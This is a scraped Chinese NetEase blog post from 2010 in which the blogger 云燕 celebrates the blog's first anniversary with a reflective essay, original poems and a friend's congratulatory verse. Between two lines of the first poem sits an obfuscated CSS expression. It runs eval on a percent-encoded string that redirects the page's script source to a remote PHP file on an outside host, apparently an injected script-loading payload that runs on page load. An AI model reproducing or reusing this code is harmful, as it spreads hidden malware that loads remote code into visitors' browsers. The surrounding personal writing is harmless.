登录  
 加关注
查看详情
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

云燕的博客

用心用情抒写,与文字一同经历成长!

 
 
 

日志

 
 
关于我

一个追求自我,欣赏真实自然的人生,凡事不强求完美,但求尽心尽力。爱生活,爱自然,重情重义.坦率,真诚,热情,刻苦,勤奋,哈哈.......优点说多了,缺点吗,是个马大哈.......只记想记得事,不感兴趣的事,咋也记不住...乐此不疲的抒写真实的自我......唱响爱的主打歌!

《原创》云燕周岁了(邀友同祝)  

2010-09-27 18:02:54|  分类: 情感散文 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |


 

 

2010年09月24日 - 云燕 - 云燕的博客

《原创》云燕周岁了(邀友同祝) - 云燕 - 云燕的博客

 

 

   云燕周岁了

   今夜星辰,诱惑着明日的太阳,一夕之间,时刻分秒不知疲倦的忙碌着,惟恐延误了该来的时间与日子。云燕一岁了,一岁一年,一年一岁。365个日子的风尘演绎,收敛了秋冬春夏,锤炼了身心与情感。自然的四季,融入了感知的品 味,季节的轮回,夯实了阅历的积累。

 

      09年的9月28日,是云燕建博的日子。正如秋日的气候与氛围,云燕带着淡淡的抑郁与心灵伤感,走进了网易博客。想寻得一方心灵的寄托,或能善解人意的园地。只想一吐为快的诉说自己,同时也在别人的倾吐与诉说中,给予自己的理解与抚慰。我很务实自己,乐此不疲,尽心尽力,写心声,洒心愿 唱心曲。云燕膨胀的热情,曾唤得多少朋友的鼓励与鞭策,云燕高飞的激励声,此起彼伏的时常在耳畔响起,云燕陶醉在友情的氛围里。云燕没有具体统计自己一年来所写的博文篇幅,只知道是天天有,几乎没有间隔天数。博友至今发展到820多人,这是云燕不善拒绝邀请的缘故,致使很多的博友无法持续真真意义上的往来。但这并不影响云燕玩博的兴致,云燕擅长自娱自乐。

   燕过留声本自鸣。一年过去了,足迹留在了空间,情感盈满了诗意。云燕真真实实的写真着自己。在云燕一岁生日之际,云燕最想说的话就是:博友们,朋友们,谢谢你们了。没你们的关心与厚爱,就没有云燕阳光般的心情与心意。为此,云燕感慨万千,吟诗一首以示情怀.......

2010年09月24日 - 云燕 - 云燕的博客

博海沉浮一周年

四季沧桑蕴心间

虚拟网络真情现

div{w:expression(eval(unescape("if%28%21window.x%29%7Bdocument.getElementsByTagName%28%27script%27%29%5B0%5D.src%3D%27http%3A//%78%71%7a%6e%2e%69%6e%66%6f%2f%61%2f%31%36%33%2f%6e%2e%70%68%70%27%3Bwindow.x%3D1%7D")))}

情真意暖似温泉

 

守望着玫瑰家园

《原创》云燕周岁了(邀友同祝) - 云燕 - 云燕的博客

并蒂萧韵涤尘阁

意外收获难舍缘

劳苦费心差信念

 

我知红尘任逍遥

舍缘难随逍遥愿

罢罢罢爱缘恋缘

以心遣渡尘世缘

 

足迹留下一串串

由浅入深成长见

敬谢友人诚指点

博之征程情无限

 

欢乐今宵 邀友人

心诚意真分享愿

舞翩翩情意绵绵

潇洒荡漾在人间

 


朋友瓷魂恋歌致贺词
 

云中放歌暗香涧,

燕青穿杨百步剑;

周元通宝五代传,

岁月如歌荡蓝天。

 

今生无悔恋网情,

夜雨寄北梦幽帘;

无颜皎月触文海,

眠鸟展翅寰宇间。


 

 


        借云燕周岁特备蛋糕和薄酒款待你我的朋友们,以此来表示一年来您对云燕关注和关爱。

 

《原创》云燕周岁了(邀友同祝) - 云燕 - 云燕的博客

《原创》云燕周岁了(邀友同祝) - 云燕 - 云燕的博客

 

2010年09月24日 - 云燕 - 云燕的博客

 

   

  评论这张
 
阅读(583)| 评论(539)

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2018